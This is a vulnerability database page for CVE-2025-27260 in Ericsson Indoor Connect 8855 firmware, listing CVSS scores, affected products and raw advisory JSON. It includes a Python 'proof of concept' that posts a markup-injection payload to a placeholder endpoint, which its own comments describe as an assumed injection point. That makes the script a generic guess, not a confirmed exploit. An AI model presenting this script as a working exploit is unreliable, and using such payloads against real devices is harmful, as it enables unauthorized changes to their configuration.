Security Vulnerability Report
CVE-2025-27260 CVSS 7.5 HIGH

CVE-2025-27260

Published: 2026-03-25 14:16:30
Last Modified: 2026-03-27 18:33:18
Source: 85b1779b-6ecd-4f52-bcc5-73eac4659dcf

Description

Ericsson Indoor Connect 8855 versions prior to 2025.Q3 contain an Improper Filtering of Special Elements vulnerability which, if exploited, can lead to unauthorized modification of certain information.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:o:ericsson:indoor_connect_8855_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:ericsson:indoor_connect_8855:-:*:*:*:*:*:*:* - NOT VULNERABLE
Ericsson Indoor Connect 8855 < 2025.Q3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python

import requests

# Proof of Concept for CVE-2025-27260
# Target: Ericsson Indoor Connect 8855 < 2025.Q3
# Description: Improper Filtering of Special Elements leading to unauthorized modification.

target_url = "http://target-ip/api/vulnerable_endpoint"  # Replace with actual target endpoint

headers = {
    "User-Agent": "Mozilla/5.0",
    "Content-Type": "application/json"
}

# Payload attempting to inject special elements to modify data
# Example assumes a JSON field that is concatenated into a command or query without sanitization
payload = {
    "config_id": "admin_settings",
    "value": "original_value</parameter><malicious_parameter>attacker_controlled_value</malicious_parameter>"
}

try:
    response = requests.post(target_url, json=payload, headers=headers, timeout=10)
    if response.status_code == 200:
        print("[+] Payload sent successfully.")
        print("[+] Response from server:")
        print(response.text)
        print("[+] Verify if the configuration has been modified on the target system.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[-] An error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-27260", "sourceIdentifier": "85b1779b-6ecd-4f52-bcc5-73eac4659dcf", "published": "2026-03-25T14:16:30.100", "lastModified": "2026-03-27T18:33:18.243", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Ericsson\nIndoor Connect 8855 versions prior to 2025.Q3 contains an Improper Filtering of Special\nElements vulnerability which, if exploited, can lead to unauthorized\nmodification of certain information"}, {"lang": "es", "value": "Ericsson\nLas versiones de Indoor Connect 8855 anteriores a 2025.Q3 contienen una vulnerabilidad de Filtrado Inadecuado de Elementos Especiales que, si se explota, puede conducir a la modificación no autorizada de cierta información."}], "metrics": {"cvssMetricV40": [{"source": "85b1779b-6ecd-4f52-bcc5-73eac4659dcf", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": 
"NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "85b1779b-6ecd-4f52-bcc5-73eac4659dcf", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-790"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:ericsson:indoor_connect_8855_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "2025.q3", "matchCriteriaId": "37C4F98B-D38A-47A6-B294-23A5E6291A81"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:ericsson:indoor_connect_8855:-:*:*:*:*:*:*:*", "matchCriteriaId": "3B0C1261-B15A-4D91-AC65-9834D16A94F1"}]}]}], "references": [{"url": "https://www.ericsson.com/en/about-us/security/psirt/CVE-2025-27260", "source": "85b1779b-6ecd-4f52-bcc5-73eac4659dcf", "tags": ["Vendor Advisory"]}, {"url": "https://www.ericsson.com/en/about-us/security/psirt/security-bulletin-indoorconnect-march-2026", "source": "85b1779b-6ecd-4f52-bcc5-73eac4659dcf", "tags": ["Vendor Advisory"]}]}}